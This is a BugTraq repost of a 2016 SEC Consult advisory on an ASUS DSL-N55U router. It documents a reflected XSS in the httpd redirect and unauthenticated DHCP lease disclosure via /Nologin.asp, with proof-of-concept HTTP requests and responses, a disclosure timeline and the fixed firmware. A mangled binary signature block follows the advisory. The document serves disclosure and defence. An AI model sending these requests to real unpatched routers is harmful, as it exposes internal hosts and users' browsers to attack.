BugTraq
SEC Consult SA-20160624-0 :: ASUS DSL-N55U router XSS and information disclosure Jun 24 2016 08:58AM
SEC Consult Vulnerability Lab (research sec-consult com)
SEC Consult Vulnerability Lab Security Advisory < 20160624-0 >
=======================================================================
title: XSS and information disclosure vulnerability
product: ASUS DSL-N55U router
vulnerable version: 3.0.0.4.376_2736
fixed version: 3.0.0.4_380_3679
CVE number: requested
impact: Medium
homepage: https://www.asus.com/
found: 2016-04-12
by: P. Morimoto (Office Bangkok)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"ASUS has long been at the forefront of this growth and while the company
started life as a humble motherboard manufacturer with just a handful of
employees, it is now the leading technology company in Taiwan with over
12,500 employees worldwide. ASUS makes products in almost every area of
Information Technology too, including PC components, peripherals,
notebooks, tablets, servers and smartphones."

Source: https://www.asus.com/sg/About_ASUS/The_Meaning_of_ASUS

Business recommendation:
------------------------
SEC Consult recommends not to use this device until a thorough security review
has been performed by security professionals and all identified issues have
been resolved.

Vulnerability overview/description:
-----------------------------------
1. Reflected Cross-Site Scripting
The vulnerability exists in the "httpd" binary in the ASUS DSL-N55U firmware.
If the web path is longer than 50 characters, it will redirect a user to
the cloud_sync.asp page with the web path as a value of a GET parameter.

Due to the lack of input validation, an attacker can insert malicious JavaScript
code to be executed under a victim's browser context.

No authentication is required.

2. Remote DHCP Information Disclosure
An unauthenticated attacker can gain access to DHCP information including
the hostname and private IP addresses of the local machines connected to the
router from the WAN IP address.

Proof of concept:
-----------------
1. Reflected Cross-Site Scripting
HTTP Request:
GET /111111111111111111111111111111111111111'+alert('XSS')+' HTTP/1.1
Host: <ASUS router IP>

HTTP Response:
HTTP/1.0 200 OK
Server: httpd
Date: Tue, 12 Apr 2016 09:04:48 GMT
Content-Type: text/html
Connection: close
<HTML><HEAD><script>location.href='/cloud_sync.asp?flag=1111111111111111
11111111111111111111111'+alert('XSS')+'';</script>
</HEAD></HTML>

2. Remote DHCP Information Disclosure
HTTP Request:
GET /Nologin.asp HTTP/1.1
Host: <ASUS router IP>

HTTP Response:
HTTP/1.0 200 Ok
Server: httpd
[...]
var dhcpLeaseInfo = [['<ip-1>', '<hostname-1>'],['<ip-2>',
'<hostname-2>'],['<ip-N>', '<hostname-N>']];;
function initial(){
[...]

Vulnerable / tested versions:
-----------------------------
The following firmware has been tested which was the most recent version
at the time of discovery:

- 3.0.0.4.376_2736 (2015/01/19 update)

URL: https://www.asus.com/support/Download/11/2/0/75/aOKU9r3fCf3pyi95/29/

Vendor contact timeline:
------------------------
2016-06-02: Contacting vendor through privacy (at) asus (dot) com [email concealed] and netadmin (at) asus.com (dot) tw. [email concealed]
2016-06-03: ASUS responds and establishes encrypted communication channel.
2016-06-06: Sending PGP encrypted security advisory to ASUS.
2016-06-20: Vulnerability is fixed in beta firmware.
2016-06-24: Public release of the advisory.

Solution:
---------
Upgrade to firmware version 3.0.0.4_380_3679 or later.

Workaround:
-----------
No workaround available.

Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Frankfurt/Main - Montreal - Moscow
Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Pichaya Morimoto / @2016

0? *?H?÷
 ?0?10
 `?He0? *?H?÷
 ? 0?¯0?? à#Ë?S?­anzTgk!0
 *?H?÷
 0o1 0 USE10U
 AddTrust AB1&0$U AddTrust External TTP Network1"0 UAddTrust External CA Root0
141222000000Z
200530104838Z0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0?"0
 *?H?÷
?0?
??±
ÚzSNpR¼V¦&·¸Ià?çQ«ñðZI£´?`¼zQB§y?¤"ßaN?Õv#
ÓJ¶ ?n¥=Ùº»þ¡?©.CRC|¯2PȦOZéØÏ?%?{?è0dæ¤øV?ý*$3?¬Dåi?£FKÂ3Ôé@?°±¬?@¹
µ?:?*S£Û= a<U?ÙNv%!)ú£|qvOîá_éûT?ÛÃ{5R·?Þ"=,0-1Y½R7°3i-CëúÖ¥ñ?wgQ?Ùî'ë¼¥8v?¤©
8ÿß?õ¬I¾Ê÷s?:2«??:=F:WtaP¾Æ@?Ëäâ?¢!£?0?0U#0?­½?z4´&÷
úÄ&Tï½à$ËT0U?ak?ᢠªOìgñ£÷´?Áì0Uÿ?0Uÿ0
ÿ0U%0++0U 
00U 0DU=0;09 7 5?3http://crl.usertrust.com/AddTrustExternalCARoot.crl05
+)0'0%+0?http://ocsp.usertrust.com0
 *?H?÷
 ?*n¬UÁ:«?ÅØíÍUóªka+À #?Åfjo±õ´µw^aß}þ³¤??üû[jr
A¼ºÁXÕ&ÂêÕM?ûþ??ÏXã"c?Rø»6«}X¥Þ«;cåÚÕsïìàû{â£ÿðB#?ʶM>äK²¨-ÔØ»BKi
?Û¦74è{à¥?Ê:Ç?O?4n?eÐ?»©ÜÊÊ6ÑôüÂd)5¯Ö±§qÒC±>?ì?2Sôv?Ê?4¹,ÊæJØ?
Á?â?ûZBj#!éeÇõÕ»~ê?? bêÑ:,YÅ?3ò8?å¶ézyöJ&ú|?û?0?_0?G #äÆBýÖ=ªÑ?nKN.0
 *?H?÷
 0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA0
160301000000Z
170301235959Z0?U1 0 UAT1
0 U270010UNiederoesterreich10U Wr. Neustadt10U Komarigasse 141.0,U
%SEC Consult Unternehmensberatung GmbH1I0GU @Issued through SEC Consult Unternehmensberatung GmbH E-PKI Manag10U Corporate Secure Email1&0$USEC Consult Vulnerability Lab1'0% *?H?÷
 research (at) sec-consult (dot) com0 [email concealed]?"0
 *?H?÷
?0?
?ª!å?J?ÿ̶à?d8Lþ5n.<À?î,ah%Â໐ÑRØDʵ?ü?HØÞ6k??»Äg| ĤYDÓÁ?õ?ƽ
¿O(?0'ª][þÍÿ?¡Á?l¤K,i?±t?©?Ý?Ò?å×嬾êæu?gæ(ãȁ??Ä*%§ñ3ò]?«{ÄÕÊ?
?0?¹??¾®O_N?;ô¡0?<¡?=ü¢?¤ûÙ~R¹ºìÛð?Æ=ÈLÇßhwRuï ðÚf§ñ6ß7õø
ç??VÔåZ¹Y# p;?oÆ@3LÓ'?EÂ+Bâ??µÄ½³f­Á ?ýMÁ]Ãräþ­£?à0?Ü0U#0??ak?ᢠªOìgñ£÷´?Áì0UÈ3­~
?¾á¼¤<"Ç©2²¦O0Uÿ 0 Uÿ00U%0++0FU ?0=0; +²10+0)+https://secure.comodo.net/CPS0]UV0T0R P
 N?Lhttp://crl.comodoca.com/COMODOSHA256ClientAuthenticationandSecureEma
ilCA.crl0+?0?0X+0?Lhttp://crt.comodoca.com/COMODOS
HA256ClientAuthenticationandSecureEmailCA.crt0$+0?http://ocsp.c
omodoca.com0#U0research (at) sec-consult (dot) com0 [email concealed]
 *?H?÷
 ?RÑá?:??¡áìa?4ÙcC~Þ?w1»_´¤¶s?kõ
¢»¿Ö;?·¦b?äÅhøÕ?!J+æ rK?Bå?Çÿ?!>?Ó6/?hTBwT?l¿¹ùÁ6¹0ß3gKß5¦ÐJ8
?}¸ÛÔ%Q N?lr#té?ÀhM¡P&'aì}Äãå£DÝ/ôV/­èÃÜ?:?öQu' %FaU?iKÚÙ?]G°õ9,ÑÒ?Vr¦NGÆ?0iæNR£ÂæKÌëìû?Â5?|eÁ\`é#mn\ë?0J?
4» £ Î?æSv¦¬}O"aÌc7¸¯®+ËzìÝ1?A0?=0°0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0
 `?He ?a0 *?H?÷
 1  *?H?÷
0 *?H?÷
 1
160624085837Z0/ *?H?÷
 1" x
D?+?íp!P$+F¾"C_×?Hö7aÿ±zãØ0l *?H?÷
 1_0]0  `?He*0  `?He0
*?H?÷
0*?H?÷
?0
*?H?÷
@0+0
*?H?÷
(0Á +?71³0°0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0Ã *?H?÷
  1³ °0?1 0 UGB10UGreater Manchester10USalford10U
COMODO CA Limited1A0?U8COMODO SHA-256 Client Authentication and Secure Email CA#äÆBýÖ=ªÑ?nKN.0
 *?H?÷
?HV?a]%?ÆcÖ*?änZÆë¡Øg?C'§¥Þ)r
BË?N?oBûå|ZÅkÓGE0 ÑÇÖê?mI Y0?
?ùÒ­?Së^?ær?&óø;?ß­6ýò!?Ú8þ?UÆ/\ãäsÏÜùw#bdÖE/Ñs,ÜÚ?±8~?ëÂ% ufipó¾pu[)~??~C1ìqXL?ÇÁê±,àë
u?×?.Ô?3d<ñÏX4.ÒáB¼ýá÷®Nú «yÀDÁLåI3á­µÍ???:} üÆsîQè]Þd(Ìñí??¶®4PK

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus